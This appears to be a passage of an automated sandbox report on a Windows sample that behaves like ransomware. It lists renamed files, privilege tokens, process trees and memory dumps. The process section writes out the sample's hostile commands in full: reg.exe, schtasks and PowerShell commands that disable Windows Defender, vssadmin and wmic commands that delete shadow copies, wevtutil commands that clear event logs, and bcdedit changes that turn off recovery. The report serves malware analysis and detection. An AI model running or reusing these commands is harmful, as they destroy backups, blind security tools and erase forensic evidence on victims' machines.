| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_6azglXMnpKY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00705_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_pICAV3dOpms0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ADD.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Ntk3WJ_hUGE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_mMPJoetjasQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281630.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_-r2y-V3WxFo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_4brTOgnSmu40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\gadget.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_9G5URH2EE1Q0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Wt5E9D_hG-k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_EN.LEX.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_bmAUTjpA3FU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_1MOin5TwB7g0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_QOV0js0kd-80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_r4xQ9KVnuRM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\hwrdeslm.dat | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_BkQA5DL5iO40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\helpmap.txt | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_0PAHV9iP9kA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_COL.HXC.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_xFDAs7LR4Ec0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow.css.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_klC0-99jnMg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_IUtZ4Slu9ZA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\ja-JP\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\settings.css | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_qBA47-oe0ZA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Flow.eftx.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_GWe7mxBjEow0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_MwcJqvAbEvM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/1544-54-0x0000000000000000-mapping.dmp
memory/556-55-0x0000000000000000-mapping.dmp
memory/676-56-0x0000000000000000-mapping.dmp
memory/576-57-0x0000000000000000-mapping.dmp
memory/1424-58-0x0000000000000000-mapping.dmp
memory/856-59-0x0000000000000000-mapping.dmp
memory/1668-60-0x0000000000000000-mapping.dmp
memory/1828-61-0x0000000000000000-mapping.dmp
memory/1132-62-0x0000000000000000-mapping.dmp
memory/916-63-0x0000000000000000-mapping.dmp
memory/812-64-0x0000000000000000-mapping.dmp
memory/1996-65-0x0000000000000000-mapping.dmp
memory/1956-66-0x0000000000000000-mapping.dmp
memory/1236-67-0x0000000000000000-mapping.dmp
memory/1872-68-0x0000000000000000-mapping.dmp
memory/2008-69-0x0000000000000000-mapping.dmp
memory/1660-70-0x0000000000000000-mapping.dmp
memory/1060-71-0x0000000000000000-mapping.dmp
memory/548-72-0x0000000000000000-mapping.dmp
memory/892-73-0x0000000000000000-mapping.dmp
memory/1736-74-0x0000000000000000-mapping.dmp
memory/776-75-0x0000000000000000-mapping.dmp
memory/1716-76-0x0000000000000000-mapping.dmp
memory/1604-77-0x0000000000000000-mapping.dmp
memory/524-78-0x0000000000000000-mapping.dmp
memory/1332-79-0x0000000000000000-mapping.dmp
memory/1256-80-0x0000000000000000-mapping.dmp
memory/1320-81-0x0000000000000000-mapping.dmp
memory/1272-82-0x0000000000000000-mapping.dmp
memory/916-83-0x0000000000000000-mapping.dmp
memory/1964-84-0x0000000000000000-mapping.dmp
memory/1492-85-0x0000000000000000-mapping.dmp
memory/1720-86-0x0000000000000000-mapping.dmp
memory/744-87-0x0000000000000000-mapping.dmp
memory/1560-88-0x0000000000000000-mapping.dmp
memory/1392-89-0x0000000000000000-mapping.dmp
memory/680-90-0x0000000000000000-mapping.dmp
memory/1744-91-0x0000000000000000-mapping.dmp
memory/1908-92-0x0000000000000000-mapping.dmp
memory/1648-93-0x0000000000000000-mapping.dmp
memory/652-94-0x0000000000000000-mapping.dmp
memory/1748-95-0x0000000000000000-mapping.dmp
memory/616-96-0x0000000000000000-mapping.dmp
memory/1968-97-0x0000000000000000-mapping.dmp
memory/1840-98-0x0000000000000000-mapping.dmp
memory/1640-99-0x0000000000000000-mapping.dmp
memory/1056-100-0x0000000000000000-mapping.dmp
memory/716-101-0x0000000000000000-mapping.dmp
memory/1704-102-0x0000000000000000-mapping.dmp
memory/268-103-0x0000000000000000-mapping.dmp
memory/576-104-0x0000000000000000-mapping.dmp
memory/1168-105-0x0000000000000000-mapping.dmp
memory/392-106-0x0000000000000000-mapping.dmp
memory/1356-107-0x0000000000000000-mapping.dmp
memory/1768-108-0x0000000000000000-mapping.dmp
memory/1136-109-0x0000000000000000-mapping.dmp
memory/1732-110-0x0000000000000000-mapping.dmp
memory/516-111-0x0000000000000000-mapping.dmp
memory/1960-112-0x0000000000000000-mapping.dmp
memory/1960-113-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp
memory/1080-114-0x0000000000000000-mapping.dmp
memory/1312-116-0x0000000000000000-mapping.dmp
memory/1112-118-0x0000000000000000-mapping.dmp
memory/460-119-0x0000000000000000-mapping.dmp
memory/2060-120-0x0000000000000000-mapping.dmp
memory/2160-123-0x0000000002920000-0x0000000002922000-memory.dmp
memory/2160-124-0x0000000002922000-0x0000000002924000-memory.dmp
memory/2160-125-0x0000000002924000-0x0000000002927000-memory.dmp
memory/2160-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 498f1c253611cac413f65403757d90f8 |
| SHA1 | 97945cc9a58405d5526f329fb7551394aba52100 |
| SHA256 | ef60d8f7d1952f9c10aedc972ec5152933aa02595470d61fc6f5645f6570ca0f |
| SHA512 | 7340d71e6d4cbf8a5ace8b5dcca0b6afd53d355c6ce84bf361f623f2752033f4e7f211b728df4e055842f84785fe1db54b477aa22c75b290e5add9832c6d76f3 |
memory/2160-127-0x000000000292B000-0x000000000294A000-memory.dmp
memory/2244-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp
memory/2244-131-0x00000000023E2000-0x00000000023E4000-memory.dmp
memory/2244-130-0x00000000023E0000-0x00000000023E2000-memory.dmp
memory/2244-133-0x00000000023EB000-0x000000000240A000-memory.dmp
memory/2244-132-0x00000000023E4000-0x00000000023E7000-memory.dmp